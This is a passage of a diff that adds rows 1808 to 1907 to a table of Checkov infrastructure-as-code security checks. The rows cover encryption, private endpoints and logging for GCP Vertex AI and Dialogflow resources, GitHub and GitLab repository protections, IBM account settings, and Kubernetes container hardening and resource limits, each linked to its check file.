+| 1808 | CKV2_GCP_23     | resource | google_document_ai_warehouse_location                   | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK)                                                                                                                  | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml)                           |
+| 1809 | CKV2_GCP_24     | resource | google_vertex_ai_endpoint                               | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK)                                                                                                                                              | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml)                                                 |
+| 1810 | CKV2_GCP_25     | resource | google_vertex_ai_featurestore                           | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK)                                                                                                                                          | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml)                                         |
+| 1811 | CKV2_GCP_26     | resource | google_vertex_ai_tensorboard                            | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK)                                                                                                                                           | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml)                                           |
+| 1812 | CKV2_GCP_27     | resource | google_workbench_instance                               | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml)                                   |
+| 1813 | CKV2_GCP_28     | resource | google_workbench_instance                               | Ensure Vertex AI workbench instances are private                                                                                                                                                         | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml)                                               |
+| 1814 | CKV2_GCP_29     | resource | google_dialogflow_agent                                 | Ensure logging is enabled for Dialogflow agents                                                                                                                                                          | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml)                                                       |
+| 1815 | CKV2_GCP_30     | resource | google_dialogflow_cx_agent                              | Ensure logging is enabled for Dialogflow CX agents                                                                                                                                                       | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml)                                                   |
+| 1816 | CKV2_GCP_31     | resource | google_dialogflow_cx_webhook                            | Ensure logging is enabled for Dialogflow CX webhooks                                                                                                                                                     | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml)                                               |
+| 1817 | CKV2_GCP_32     | resource | google_tpu_v2_vm                                        | Ensure TPU v2 is private                                                                                                                                                                                 | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml)                                                                     |
+| 1818 | CKV2_GCP_33     | resource | google_vertex_ai_endpoint                               | Ensure Vertex AI endpoint is private                                                                                                                                                                     | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml)                                                                   |
+| 1819 | CKV2_GCP_34     | resource | google_vertex_ai_index_endpoint                         | Ensure Vertex AI index endpoint is private                                                                                                                                                               | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml)                                                         |
+| 1820 | CKV2_GCP_35     | resource | google_notebooks_runtime                                | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK)                                                                                                                                  | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml)                                                       |
+| 1821 | CKV2_GCP_36     | resource | google_notebooks_runtime                                | Ensure Vertex AI runtime is private                                                                                                                                                                      | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml)                                                                         |
+| 1822 | CKV_GIT_1       | resource | github_repository                                       | Ensure GitHub repository is Private                                                                                                                                                                      | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py)                                                                                                      |
+| 1823 | CKV_GIT_2       | resource | github_repository_webhook                               | Ensure GitHub repository webhooks are using HTTPS                                                                                                                                                        | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py)                                                                                        |
+| 1824 | CKV_GIT_3       | resource | github_repository                                       | Ensure GitHub repository has vulnerability alerts enabled                                                                                                                                                | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py)                                                      |
+| 1825 | CKV_GIT_4       | resource | github_actions_environment_secret                       | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                            |
+| 1826 | CKV_GIT_4       | resource | github_actions_organization_secret                      | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                            |
+| 1827 | CKV_GIT_4       | resource | github_actions_secret                                   | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                            |
+| 1828 | CKV_GIT_5       | resource | github_branch_protection                                | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                                    |
+| 1829 | CKV_GIT_5       | resource | github_branch_protection_v3                             | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                                    |
+| 1830 | CKV_GIT_6       | resource | github_branch_protection                                | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                                    |
+| 1831 | CKV_GIT_6       | resource | github_branch_protection_v3                             | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                                    |
+| 1832 | CKV2_GIT_1      | resource | github_repository                                       | Ensure each Repository has branch protection associated                                                                                                                                                  | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml)                                                          |
+| 1833 | CKV_GLB_1       | resource | gitlab_project                                          | Ensure at least two approving reviews are required to merge a GitLab MR                                                                                                                                  | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py)                                                                        |
+| 1834 | CKV_GLB_2       | resource | gitlab_branch_protection                                | Ensure GitLab branch protection rules does not allow force pushes                                                                                                                                        | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py)                                                                                          |
+| 1835 | CKV_GLB_3       | resource | gitlab_project                                          | Ensure GitLab prevent secrets is enabled                                                                                                                                                                 | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py)                                                                                  |
+| 1836 | CKV_GLB_4       | resource | gitlab_project                                          | Ensure GitLab commits are signed                                                                                                                                                                         | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py)                                                                                  |
+| 1837 | CKV2_IBM_1      | resource | ibm_is_lb                                               | Ensure load balancer for VPC is private (disable public access)                                                                                                                                          | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml)                                                         |
+| 1838 | CKV2_IBM_2      | resource | ibm_is_vpc                                              | Ensure VPC classic access is disabled                                                                                                                                                                    | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml)                                                           |
+| 1839 | CKV2_IBM_3      | resource | ibm_iam_account_settings                                | Ensure API key creation is restricted in account settings                                                                                                                                                | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml)                                 |
+| 1840 | CKV2_IBM_4      | resource | ibm_iam_account_settings                                | Ensure Multi-Factor Authentication (MFA) is enabled at the account level                                                                                                                                 | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml)                                                                 |
+| 1841 | CKV2_IBM_5      | resource | ibm_iam_account_settings                                | Ensure Service ID creation is restricted in account settings                                                                                                                                             | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml)                           |
+| 1842 | CKV2_IBM_7      | resource | ibm_container_cluster                                   | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint                                                                                                              | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml)                                       |
+| 1843 | CKV_K8S_1       | resource | kubernetes_pod_security_policy                          | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py)                                                                                          |
+| 1844 | CKV_K8S_2       | resource | kubernetes_pod_security_policy                          | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py)                                                                            |
+| 1845 | CKV_K8S_3       | resource | kubernetes_pod_security_policy                          | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py)                                                                                          |
+| 1846 | CKV_K8S_4       | resource | kubernetes_pod_security_policy                          | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py)                                                              |
+| 1847 | CKV_K8S_5       | resource | kubernetes_pod_security_policy                          | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py)                                                                  |
+| 1848 | CKV_K8S_6       | resource | kubernetes_pod_security_policy                          | Do not admit root containers                                                                                                                                                                             | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py)                                                                                        |
+| 1849 | CKV_K8S_7       | resource | kubernetes_pod_security_policy                          | Do not admit containers with the NET_RAW capability                                                                                                                                                      | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py)                                                                                  |
+| 1850 | CKV_K8S_8       | resource | kubernetes_deployment                                   | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 1851 | CKV_K8S_8       | resource | kubernetes_deployment_v1                                | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 1852 | CKV_K8S_8       | resource | kubernetes_pod                                          | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 1853 | CKV_K8S_8       | resource | kubernetes_pod_v1                                       | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                              |
+| 1854 | CKV_K8S_9       | resource | kubernetes_deployment                                   | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 1855 | CKV_K8S_9       | resource | kubernetes_deployment_v1                                | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 1856 | CKV_K8S_9       | resource | kubernetes_pod                                          | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 1857 | CKV_K8S_9       | resource | kubernetes_pod_v1                                       | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                            |
+| 1858 | CKV_K8S_10      | resource | kubernetes_deployment                                   | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 1859 | CKV_K8S_10      | resource | kubernetes_deployment_v1                                | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 1860 | CKV_K8S_10      | resource | kubernetes_pod                                          | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 1861 | CKV_K8S_10      | resource | kubernetes_pod_v1                                       | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                                  |
+| 1862 | CKV_K8S_11      | resource | kubernetes_deployment                                   | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 1863 | CKV_K8S_11      | resource | kubernetes_deployment_v1                                | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 1864 | CKV_K8S_11      | resource | kubernetes_pod                                          | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 1865 | CKV_K8S_11      | resource | kubernetes_pod_v1                                       | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                                      |
+| 1866 | CKV_K8S_12      | resource | kubernetes_deployment                                   | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 1867 | CKV_K8S_12      | resource | kubernetes_deployment_v1                                | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 1868 | CKV_K8S_12      | resource | kubernetes_pod                                          | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 1869 | CKV_K8S_12      | resource | kubernetes_pod_v1                                       | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                                |
+| 1870 | CKV_K8S_13      | resource | kubernetes_deployment                                   | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 1871 | CKV_K8S_13      | resource | kubernetes_deployment_v1                                | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 1872 | CKV_K8S_13      | resource | kubernetes_pod                                          | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 1873 | CKV_K8S_13      | resource | kubernetes_pod_v1                                       | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                            |
+| 1874 | CKV_K8S_14      | resource | kubernetes_deployment                                   | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 1875 | CKV_K8S_14      | resource | kubernetes_deployment_v1                                | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 1876 | CKV_K8S_14      | resource | kubernetes_pod                                          | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 1877 | CKV_K8S_14      | resource | kubernetes_pod_v1                                       | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                              |
+| 1878 | CKV_K8S_15      | resource | kubernetes_deployment                                   | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 1879 | CKV_K8S_15      | resource | kubernetes_deployment_v1                                | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 1880 | CKV_K8S_15      | resource | kubernetes_pod                                          | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 1881 | CKV_K8S_15      | resource | kubernetes_pod_v1                                       | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                              |
+| 1882 | CKV_K8S_16      | resource | kubernetes_deployment                                   | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 1883 | CKV_K8S_16      | resource | kubernetes_deployment_v1                                | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 1884 | CKV_K8S_16      | resource | kubernetes_pod                                          | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 1885 | CKV_K8S_16      | resource | kubernetes_pod_v1                                       | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py)                                                                                  |
+| 1886 | CKV_K8S_17      | resource | kubernetes_deployment                                   | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 1887 | CKV_K8S_17      | resource | kubernetes_deployment_v1                                | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 1888 | CKV_K8S_17      | resource | kubernetes_pod                                          | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 1889 | CKV_K8S_17      | resource | kubernetes_pod_v1                                       | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py)                                                                                                |
+| 1890 | CKV_K8S_18      | resource | kubernetes_deployment                                   | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 1891 | CKV_K8S_18      | resource | kubernetes_deployment_v1                                | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 1892 | CKV_K8S_18      | resource | kubernetes_pod                                          | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 1893 | CKV_K8S_18      | resource | kubernetes_pod_v1                                       | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py)                                                                                                |
+| 1894 | CKV_K8S_19      | resource | kubernetes_deployment                                   | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 1895 | CKV_K8S_19      | resource | kubernetes_deployment_v1                                | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 1896 | CKV_K8S_19      | resource | kubernetes_pod                                          | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 1897 | CKV_K8S_19      | resource | kubernetes_pod_v1                                       | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py)                                                                    |
+| 1898 | CKV_K8S_20      | resource | kubernetes_deployment                                   | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 1899 | CKV_K8S_20      | resource | kubernetes_deployment_v1                                | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 1900 | CKV_K8S_20      | resource | kubernetes_pod                                          | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 1901 | CKV_K8S_20      | resource | kubernetes_pod_v1                                       | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py)                                                                        |
+| 1902 | CKV_K8S_21      | resource | kubernetes_config_map                                   | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1903 | CKV_K8S_21      | resource | kubernetes_config_map_v1                                | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1904 | CKV_K8S_21      | resource | kubernetes_cron_job                                     | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1905 | CKV_K8S_21      | resource | kubernetes_cron_job_v1                                  | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1906 | CKV_K8S_21      | resource | kubernetes_daemon_set_v1                                | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
+| 1907 | CKV_K8S_21      | resource | kubernetes_daemonset                                    | The default namespace should not be used                                                                                                                                                                 | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py)                                                                                        |
